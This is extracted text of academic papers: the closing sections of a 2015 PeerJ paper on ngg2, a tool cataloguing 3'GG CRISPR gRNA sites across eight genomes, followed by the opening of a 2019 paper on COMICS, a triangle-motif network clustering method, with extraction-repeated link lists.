excluding N bases (Table 5). None of the tested genomes met the expected GC success rate. The rate of picking a CGG or GGG PAM was less than the genome GC content in S. cerevisiae, M. musculus, Sus scrofa, Loxodonta africana, and H. sapiens. In particular, the estimate for M. musculus, H. sapiens, and Loxodonta africana was >10% different from the genome GC fraction. This is not necessarily unexpected. The CGG PAM site includes a 5′ CpG dinucleotide that is generally underrepresented due to the relatively high frequency of methyl-cytosine deamination to thymine. C. elegans, D. melanogaster, and D. rerio were the exceptions, with CGG and GGG PAM selection greater than the expected frequency. Roberson (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.33 6/11 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.33 Figure 1 PAM site usage across tested species. Each species has four potential protospacer adjacent motifs (PAM) possible for identified gRNA sites. The stacked bar chart shows the fraction of all PAM sites each motif occupies. The CGG motif, that includes a CpG dinucleotide, is the least prevalent motif in the zebrafish, mouse, human, elephant, and pig genomes. However, C. elegans may not be unexpected, as it lacks DNA methylation and would not necessarily be at an advantage to limit CpG dinucleotides. Most protein coding genes overlap at least one unique 3′GG gRNA A common use of genome engineering is to knock out or otherwise modify the function of a protein coding gene. The efficiency of such edits is critical, as just introducing frame-shifting mutations can require screening a large number single-cell clones or derived animals to identify a successful edit. As part of this study, I annotated for each gRNA in the 8 species if there was any overlap with a gene. Conversely, I also annotate a count of how many of each of the four classes (all sites, all unique sites, canonical sites, and unique canonical sites) overlap every gene. No less than 89% of any species’ genes overlap at least one unique 3′GG gRNA (Table 6). This catalog of potential sites demonstrates that most protein coding genes can be targeted by at least one 3′GG gRNA site to achieve high editing efficiency. DISCUSSION In this manuscript, I have described a new tool for identifying 3′GG gRNA sites and presented a catalog of potential editing sites in 8 species. Importantly, many genomic loci Roberson (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.33 7/11 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.33 Table 5 PAM site frequency compared to genome GC content. The average genome GC content and the estimated chance of picking a GC PAM site (CGG or GGG) are shown for each species. GC content was calculated from the downloaded reference files. gRNA type Species gc Estimate p. value p. adj All Saccharomyces cerevisiae 0.382 0.298 2.30E−301 1.10E−300 Caenorhabditis elegans 0.354 0.422 1.98E−323 3.01E−322 Drosophila melanogaster 0.420 0.452 3.46E−323 4.79E−322 Danio rerio 0.367 0.373 7.90E−218 3.20E−217 Mus musculus 0.417 0.298 1.58E−322 1.40E−321 Homo sapiens 0.409 0.251 1.68E−322 1.40E−321 Loxodonta africana 0.408 0.289 1.58E−322 1.40E−321 Sus scrofa 0.417 0.352 1.58E−322 1.40E−321 Canonical Saccharomyces cerevisiae 0.382 0.284 1.00E−98 2.10E−98 Caenorhabditis elegans 0.354 0.420 9.88E−324 1.58E−322 Drosophila melanogaster 0.420 0.438 4.70E−81 4.70E−81 Danio rerio 0.367 0.376 1.60E−102 4.80E−102 Mus musculus 0.417 0.299 8.40E−323 1.10E−321 Homo sapiens 0.409 0.250 8.40E−323 1.10E−321 Loxodonta africana 0.408 0.288 8.40E−323 1.10E−321 Sus scrofa 0.417 0.344 8.40E−323 1.10E−321 Table 6 Fraction of genes overlapping at least one gRNA. Ensembl GTF files were used to annotate overlap of gRNA sites with known genes. A gene was called as potentially cut if at least one gRNA overlapped at least 1 base with an exon of that gene. Most genes in the 8 species have at least one unique cut per gene. All motifs Canonical motifs Species All Unique All Unique S. cerevisiae 0.93 0.90 0.65 0.62 C. elegans 0.96 0.83 0.81 0.68 D. melanogaster 0.99 0.97 0.91 0.89 D. rerio 0.89 0.61 0.74 0.42 M. musculus 0.99 0.96 0.90 0.84 S. scrofa 0.99 0.86 0.92 0.76 H. sapiens 0.98 0.93 0.92 0.84 L. africana 0.91 0.87 0.61 0.59 can be targeted by unique 3′GG gRNA sites. The efficiency of 3′GG gRNA sites in species other than C. elegans has yet to be established, but is worth further study. This tool reports the uniqueness of identified sites, but blast searching of potential gRNA sequences is warranted to identify near-match sites. It is also important to consider the target genome’s specific genotypes when designing a gRNA. In particular, variants that alter PAM sites away from NGG will not be cleaved by Cas9 even if the gRNA is an exact match. Roberson (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.33 8/11 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.33 The accuracy of editing can be improved by using two gRNAs and a mutant Cas9 nickase. I observed significant, but low-effect strand bias in these genomes. This may lead to some loci not being compatible with paired 3′GG gRNA sites. When possible, choosing paired 3′GG gRNA sites should be strongly considered. Efficiencies of less than 10% were increased to 50% efficiency or greater by using the 3′GG strategy (Farboud & Meyer, 2015). As such, using paired 3′GG gRNAs with a nickase may give the best of both worlds with both high accuracy and high efficiency. It is important to note that ngg2 will operate on any indexed FASTA file. Many gRNA site finding tools are limited to catalogs of gRNA sites in model organisms. This tool fills an important gap for individuals working outside of commonly used species, demonstrated by the use of ngg2 on the genomes of S. scrofa and L. africana. The provided gRNA site survey and associated tool, ngg2, represent a valuable resource for designing genomic modification strategies. ACKNOWLEDGEMENTS I wish to thank Dr. Li Cao for her helpful comments during the preparation of this manuscript, and Dr. Matthew Shirley for his suggested use of pyfaidx. ADDITIONAL INFORMATION AND DECLARATIONS Funding A portion of effort spent on designing this software was supported under NIH P30 AR048335 as an activity of the Human Genomics and Bioinformatics Facility in the Washington University Rheumatic Disease Core Center. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the author: NIH: P30 AR048335. Competing Interests I have no competing interests related to this manuscript or tool. Author Contributions • Elisha D. Roberson conceived and designed the experiments, performed the experi- ments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/2015 ngg2 manuscript http://dx.doi.org/10.6084/m9.figshare.1515944. Roberson (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.33 9/11 https://peerj.com/computer-science/ https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/ngg2 https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript https://github.com/RobersonLab/2015_ngg2_manuscript http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.7717/peerj-cs.33 REFERENCES Barrangou R, Fremaux C, Deveau H, Richards M, Boyaval P, Moineau S, Romero DA, Horvath P. 2007. CRISPR provides acquired resistance against viruses in prokaryotes. Science 315:1709–1712 DOI 10.1126/science.1138140. Chen B, Gilbert Luke A, Cimini BA, Schnitzbauer J, Zhang W, Li G-W, Park J, Blackburn EH, Weissman JS, Qi LS, Huang B. 2013. Dynamic imaging of genomic loci in living human cells by an optimized CRISPR/Cas system. Cell 155:1479–1491 DOI 10.1016/j.cell.2013.12.001. Deltcheva E, Chylinski K, Sharma CM, Gonzales K, Chao Y, Pirzada ZA, Eckert MR, Vogel J, Charpentier E. 2011. CRISPR RNA maturation by trans-encoded small RNA and host factor RNase III. Nature 471:602–607 DOI 10.1038/nature09886. Doudna JA, Charpentier E. 2014. The new frontier of genome engineering with CRISPR-Cas9. Science 346:1258096 DOI 10.1126/science.1258096. Farboud B, Meyer BJ. 2015. Dramatic enhancement of genome editing by CRISPR/Cas9 through improved guide RNA design. Genetics 199:959–971 DOI 10.1534/genetics.115.175166. Gratz SJ, Ukken FP, Rubinstein CD, Thiede G, Donohue LK, Cummings AM, O’Connor- Giles KM. 2014. Highly specific and efficient CRISPR/Cas9-Catalyzed homology-directed repair in Drosophila. Genetics 196:961–971 DOI 10.1534/genetics.113.160713. Heigwer F, Kerr G, Boutros M. 2014. E-CRISP: fast CRISPR target site identification. Nature Methods 11:122–123 DOI 10.1038/nmeth.2812. Hsu PD, Lander ES, Zhang F. 2014. Development and applications of CRISPR-Cas9 for genome engineering. Cell 157:1262–1278 DOI 10.1016/j.cell.2014.05.010. Jiang F, Doudna JA. 2015. The structural biology of CRISPR-Cas systems. Current Opinion in Structural Biology 30:100–111 DOI 10.1016/j.sbi.2015.02.002. Kim S, Kim D, Cho SW, Kim J, Kim J-S. 2014. Highly efficient RNA-guided genome editing in human cells via delivery of purified Cas9 ribonucleoproteins. Genome Research 24:1012–1019 DOI 10.1101/gr.171322.113. Lawrence M, Huber W, Pagès H, Aboyoun P, Carlson M, Gentleman R, Morgan MT, Carey VJ. 2013. Software for computing and annotating genomic ranges. PLoS Computational Biology 9:e1003118 DOI 10.1371/journal.pcbi.1003118. Liu H, Wei Z, Dominguez A, Li Y, Wang X, Qi LS. 2015. CRISPR-ERA: a comprehensive design tool for CRISPR-mediated gene editing, repression and activation. Bioinformatics 31(22):3676–3678 DOI 10.1093/bioinformatics/btv423. Makarova K, Grishin N, Shabalina S, Wolf Y, Koonin E. 2006. A putative RNA-interference-based immune system in prokaryotes: computational analysis of the predicted enzymatic machinery, functional analogies with eukaryotic RNAi, and hypothetical mechanisms of action. Biology Direct 1:7 DOI 10.1186/1745-6150-1-7. Mali P, Esvelt KM, Church GM. 2013. Cas9 as a versatile tool for engineering biology. Nature Methods 10:957–963 DOI 10.1038/nmeth.2649. Mojica FJM, Dı́ez-Villaseñor C, Garcı́a-Martı́nez J, Almendros C. 2009. Short motif sequences determine the targets of the prokaryotic CRISPR defence system. Microbiology 155:733–740 DOI 10.1099/mic.0.023960-0. Montague TG, Cruz JM, Gagnon JA, Church GM, Valen E. 2014. CHOPCHOP: a CRISPR/Cas9 and TALEN web tool for genome editing. Nucleic Acids Research 42:W401–W407 DOI 10.1093/nar/gku410. Roberson (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.33 10/11 https://peerj.com/computer-science/ http://dx.doi.org/10.1126/science.1138140 http://dx.doi.org/10.1016/j.cell.2013.12.001 http://dx.doi.org/10.1038/nature09886 http://dx.doi.org/10.1126/science.1258096 http://dx.doi.org/10.1534/genetics.115.175166 http://dx.doi.org/10.1534/genetics.113.160713 http://dx.doi.org/10.1038/nmeth.2812 http://dx.doi.org/10.1016/j.cell.2014.05.010 http://dx.doi.org/10.1016/j.sbi.2015.02.002 http://dx.doi.org/10.1101/gr.171322.113 http://dx.doi.org/10.1371/journal.pcbi.1003118 http://dx.doi.org/10.1093/bioinformatics/btv423 http://dx.doi.org/10.1186/1745-6150-1-7 http://dx.doi.org/10.1038/nmeth.2649 http://dx.doi.org/10.1099/mic.0.023960-0 http://dx.doi.org/10.1093/nar/gku410 http://dx.doi.org/10.7717/peerj-cs.33 Naito Y, Hino K, Bono H, Ui-Tei K. 2015. CRISPRdirect: software for designing CRISPR/Cas guide RNA with reduced off-target sites. Bioinformatics 31:1120–1123 DOI 10.1093/bioinformatics/btu743. R Core Team. 2014. R: a language and environment for statistical computing. 3.1.2 edition. R Foundation for Statistical Computing. Ran FA, Hsu PD, Lin C-Y, Gootenberg JS, Konermann S, Trevino AE, Scott DA, Inoue A, Matoba S, Zhang Y, Zhang F. 2013a. Double nicking by RNA-Guided CRISPR Cas9 for enhanced genome editing specificity. Cell 154:1380–1389 DOI 10.1016/j.cell.2013.08.021. Ran FA, Hsu PD, Wright J, Agarwala V, Scott DA, Zhang F. 2013b. Genome engineering using the CRISPR-Cas9 system. Nature Protocols 8:2281–2308 DOI 10.1038/nprot.2013.143. Roberson E. 2015. Homo sapiens cuts per gene annotated for 3 prime GG motif gRNAS—exhaustive scan. Available at http://dx.doi.org/10.6084/m9.figshare.1515944. Shirley M, Ma Z, Pedersen B, Wheelan S. 2015. Efficient “pythonic” access to FASTA files using pyfaidx. PeerJ PrePrints 3:e1196 DOI 10.7717/peerj.1196. Stemmer M, Thumberger T, Del Sol Keyer M, Wittbrodt J, Mateo JL. 2015. CCTop: an intuitive, flexible and reliable CRISPR/Cas9 target prediction tool. PLoS ONE 10:e0124633 DOI 10.1371/journal.pone.0124633. Xiao A, Cheng Z, Kong L, Zhu Z, Lin S, Gao G, Zhang B. 2014. CasOT: a genome-wide Cas9/gRNA off-target searching tool. Bioinformatics 30:1180–1182 DOI 10.1093/bioinformatics/btt764. Xie Y. 2013. Dynamic documents with R and knitr. Boca Raton: Chapman and Hall/CRC. Xie K, Minkenberg B, Yang Y. 2015. Boosting CRISPR/Cas9 multiplex editing capability with the endogenous tRNA-processing system. Proceedings of the National Academy of Sciences of the United States of America 112:3570–3575 DOI 10.1073/pnas.1420294112. Roberson (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.33 11/11 https://peerj.com/computer-science/ http://dx.doi.org/10.1093/bioinformatics/btu743 http://dx.doi.org/10.1016/j.cell.2013.08.021 http://dx.doi.org/10.1038/nprot.2013.143 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.6084/m9.figshare.1515944 http://dx.doi.org/10.7717/peerj.1196 http://dx.doi.org/10.1371/journal.pone.0124633 http://dx.doi.org/10.1093/bioinformatics/btt764 http://dx.doi.org/10.1073/pnas.1420294112 http://dx.doi.org/10.7717/peerj-cs.33 Identification of high-efficiency 3'GG gRNA motifs in indexed FASTA files with ngg2 Introduction Materials & Methods ngg2 motif identification Multi-species site identification Results 3'GG gRNA sites are common in each species Little strand bias observed for canonical 3'GG gRNA sites CGG & GGG PAM sites are underrepresented Most protein coding genes overlap at least one unique 3'GG gRNA Discussion Acknowledgements References work_6iejq5km6bh3fp7caakywxrp5m ---- COMICS: a community property-based triangle motif clustering scheme COMICS: a community property-based triangle motif clustering scheme Yufan Feng1, Shuo Yu1, Kaiyuan Zhang1, Xiangli Li1 and Zhaolong Ning1,2 1 School of Software, Dalian University of Technology, Dalian, China 2 State Key Laboratory for Novel Software Technology, Nanjing University, Nanjing, China ABSTRACT With the development of science and technology, network scales of various fields have experienced an amazing growth. Networks in the fields of biology, economics and society contain rich hidden information of human beings in the form of connectivity structures. Network analysis is generally modeled as network partition and community detection problems. In this paper, we construct a community property-based triangle motif clustering scheme (COMICS) containing a series of high efficient graph partition procedures and triangle motif-based clustering techniques. In COMICS, four network cutting conditions are considered based on the network connectivity. We first divide the large-scale networks into many dense subgraphs under the cutting conditions before leveraging triangle motifs to refine and specify the partition results. To demonstrate the superiority of our method, we implement the experiments on three large-scale networks, including two co-authorship networks (the American Physical Society (APS) and the Microsoft Academic Graph (MAG)), and two social networks (Facebook and gemsec-Deezer networks). We then use two clustering metrics, compactness and separation, to illustrate the accuracy and runtime of clustering results. A case study is further carried out on APS and MAG data sets, in which we construct a connection between network structures and statistical data with triangle motifs. Results show that our method outperforms others in both runtime and accuracy, and the triangle motif structures can bridge network structures and statistical data in the academic collaboration area. Subjects Algorithms and Analysis of Algorithms, Graphics, Network Science and Online Social Networks Keywords Community property, Triangle motif, Large network, Clustering INTRODUCTION In all aspects of human endeavor, we are in the world of large-scale data, embracing the aspects of biology, medicine, social, traffic, and science (Ning et al., 2017). These data sets describe the complicated real-world systems from various and complementary viewpoints. Generally, the entities in real-world systems are modeled as nodes, whose connections and relationships are modeled as edges. Those networks become new carriers of rich information from domain-specific areas, such as the reciprocity among people in online social networks (Koll, Li & Fu, 2013). More than that, human beings are inclined to cooperate or participate in group activities, which can be reflected in social and academic collaboration networks. To be more specific, in academic area, big scholarly data grows rapidly, containing millions of authors, papers, citations, figures, tables, and other How to cite this article Feng Y, Yu S, Zhang K, Li X, Ning Z. 2019. COMICS: a community property-based triangle motif clustering scheme. PeerJ Comput. Sci. 5:e180 DOI 10.7717/peerj-cs.180 Submitted 3 December 2018 Accepted 9 February 2019 Published 11 March 2019 Corresponding author Zhaolong Ning, zhaolongning@dlut.edu.cn Academic editor Yilun Shang Additional Information and Declarations can be found on page 19 DOI 10.7717/peerj-cs.180 Copyright 2019 Feng et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.180 mailto:zhaolongning@�dlut.�edu.�cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.180 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ massive scale related data, such as digital libraries and scholarly networks (Xia et al., 2017). As collaboration behaviors among scholars are becoming frequent, collaboration networks are generally in large-scale and contain rich collaboration information, reflecting the cooperation patterns among scholars in different research areas. Bordons et al. (1996) regard the academic teams as scientists communities, in which scholars can share research methods, materials, and financial resources rather than institutions organized by fixed structures (Barjak & Robinson, 2008). Furthermore, the ternary closures in social networks constitute a minimal stable structure; that is, a loop with three nodes. The number of ternary closures in social networks changes over time, which reveals the evolvement of human social behaviors. Besides, the definition of a clustering coefficient is based on the distributions of ternary closures. Milo et al. (2002) defined small network structures as motifs to present interconnections in complex networks by numbers that are significantly higher than those in randomized networks. Motifs can define universal classes of networks, and researchers are carrying on the motif detection experiments on networks from different areas, such as biochemistry, neurobiology, and engineering, to uncover the existence of motifs and the corresponding structure information in networks (Ribeiro, Silva & Kaiser, 2009; Bian & Zhang, 2016). Hence, triangle motifs can be used to uncover relationships in networks. Connectivity is a fundamental character in both graph theory and network science. When networks are in small-scale, the dense areas can be easily identified. However, with the rapid growth of network scale and diversity, many graph partition methods, community detection, and clustering algorithms fail to uncover the information of graph structure. Graph partition and mining algorithms consume a large amount of time when dealing with large-scale networks, for example, the gSpan algorithm (Yan & Han, 2002) and the Min–Cut algorithm (Stoer & Wagner, 1997), which overlook the elementary network structures. The clusters and subgraphs of a large network are generally have small internal distances and large external distances among nodes. Considering the ternary closures, triangle network motifs have been regarded as elementary units in networks. However, a general method to cluster the communities and analyze the relationships with community properties and triangle motifs effectively is still lacking. In this paper, we propose a community property-based triangle motif clustering scheme (COMICS) to cluster network communities, and analyze the relationships with triangle motifs. In this method, we partition networks with the edge connection properties and regard the undirected and unweighted complete triangle motifs as the element clustering units. The partition operations are based on four network cutting conditions, whose definitions are based on the network connectivity to maintain the massive links in networks. More than that, by considering the American Physical Society (APS) and Microsoft Academic Graph (MAG) data sets in the academic analysis area, we regard each cluster generated from the input network as an academic team, and define three metrics: teamwork of collaborator variance (TCV), teamwork of paper variance (TPV), and motif variances of scholars (MSV) to evaluate the Feng et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.180 2/22 http://dx.doi.org/10.7717/peerj-cs.180 https://peerj.com/computer-science/ behaviors of the detected academic teams. Our contributions can be summarized as follows: � By jointly considering time complexity and clustering accuracy, we construct the COMICS, which mines the structure information with complete triangle motifs. A series of speed-up and refining methods, graph partition and refining techniques, are integrated to improve the performance of the basic clustering process. � We prove the time complexity of the presented algorithm is O(rn3), where r is the number of the clustered subgraphs from the original large network, and n is the number of nodes. � We regard the undirected and unweight complete triangle motif as the elementary unit instead of nodes in the clustering procedure. Our work verifies that the complete triangle motif is available in network analysis. � We define three metrics to analyze the hidden information in academic collaboration networks. Performance evaluations show that the academic teams with high quantity of scholar motif variances also have high values of TCVs. The roadmap of this paper is illustrated as follows. We briefly illustrate the related works in the following section. After that, a series of fundamental definitions, problem statement, and some necessary notations are described. Then, we describe the architecture of COMICS in details. We evaluate the performance of our method with three large-scale networks as case studies in the experiment section. Finally, we conclude this paper. RELATED WORK Information mining from large-scale networks is a significant research topic, reflecting the connecting patterns, and the social relationships among different entities (Shi et al., 2017; Schaeffer, 2007). In collaboration networks, the information reflects the collaboration patterns and academic social relationships among scholars in different disciplines. Community detection is traditionally considered as a kind of graph partition to discover exhaustive and disjoined node clusters in a given network (Khan et al., 2017). The discovery of structures in networks has attracted scholars’ attentions for a long time. The authors in Leskovec et al. (2009) explore from a novel perspective to identify meaningful communities in large social and information networks. They notice that large networks have very different structures. For example, different transcription networks from Escherichia coli and Saccharomyces cerevisiae have large differences in the frequency motif structures (Wegner, 2014). Over the past years, a number of graph clustering methods have been investigated. For example, evolutionary algorithms (EAs) have been proposed and applied successfully in the network optimization and clustering problems (Gong et al., 2012). Recently, scholars have successfully developed both single- and multi-objective EAs to discover internal structure information of networks (Li & Liu, 2016; Pizzuti, 2012). A particle swarm optimization algorithm is put forward, which reveals community structures in large-scale social networks (Cai et al., 2015). In Girvan & Newman (2002), node centrality and betweeness centrality were used to extract Feng et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.180 3/22 http://dx.doi.org/10.7717/peerj-cs.180 https://peerj.com/computer-science/ communities in a network. Since modularity is becoming very popular by partitioning networks into non-overlapping subgraphs, modularity score, compactness-isolation, and other criteria are leveraged to evaluate functions in large graph partition problems Bagrow (2008). A number of large-scale partition methods based on community detection start with a given seed, and then expand by iteratively adding the neighboring node that contributes most to the score function, until the score function stops improving (Luo, Wang & Promislow, 2008; Ma et al., 2014). The authors in Du et al. (2007) developed an efficient community detection method in social networks, which combines the topological information with the entity attributions to detect network communities. However, this method works for merely part of network structures. Motifs in networks are small connected subnetworks, occurring in significant high frequencies and have recently gathered attentions. Motifs in networks have been studied as elementary structures in complex network analysis (Shervashidze et al., 2009). In hypergraphs, the clustering algorithms mainly focus on transforming the hypergraphs into simple graphs (Zhou, Huang & Schölkopf, 2006). Then, the simple graphs can be clustered with spectral clustering procedures based on the normalized Laplacian matrices (Li & Milenkovic, 2017). In that case, the motifs can be constructed with nodes from different graph layers of hypergraphs (Zhou, Huang & Schölkopf, 2006), for example, a triangle motif can be used to represent one heterogeneous hypergraph with three different layers. More than that, conductance is a vital definition in spectral clustering (Louis, 2015; Li & Milenkovic, 2018). Hence, in large-scale networks, spectral clustering and motif are combined to large-scale network clustering. Triangle motif structures guarantee the structural connections. The motif-based conductance ensures the applicability spectral clustering in large-scale networks. Some local graph clustering methods have been investigated by incorporating high-order network information captured by small subgraphs (Yin et al., 2017; Lee, Gharan & Trevisan, 2014; Li et al., 2017b). In Wegner (2014), the authors define a subgraph cover to represent the network with motifs. The cover consists of a 